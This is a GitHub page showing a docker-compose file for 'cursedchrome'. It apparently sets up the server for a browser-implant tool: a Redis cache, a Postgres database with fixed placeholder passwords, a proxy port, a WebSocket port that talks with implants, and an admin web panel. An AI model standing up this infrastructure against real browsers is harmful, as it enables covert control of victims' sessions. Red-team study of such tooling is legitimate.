-
Notifications
You must be signed in to change notification settings - Fork 252
Expand file tree
/
Copy pathdocker-compose.yaml
More file actions
32 lines (32 loc) · 825 Bytes
/
docker-compose.yaml
File metadata and controls
32 lines (32 loc) · 825 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
services:
redis:
image: "redis:alpine"
command: redis-server --appendonly no
db:
image: postgres
restart: always
environment:
POSTGRES_PASSWORD: cursedchrome
POSTGRES_USER: cursedchrome
POSTGRES_DB: cursedchrome
cursedchrome:
build: .
volumes:
- ./ssl:/work/cassl
depends_on:
- db
- redis
environment:
DATABASE_NAME: cursedchrome
DATABASE_USER: cursedchrome
DATABASE_PASSWORD: cursedchrome
DATABASE_HOST: db
REDIS_HOST: redis
# Number of bcrypt rounds for
# storing admin panel passwords.
BCRYPT_ROUNDS: 10
DEBUGGING: "yes"
ports:
- "127.0.0.1:8080:8080" # Proxy server
- "127.0.0.1:4343:4343" # WebSocket server (talks with implants)
- "127.0.0.1:8118:8118" # Web panel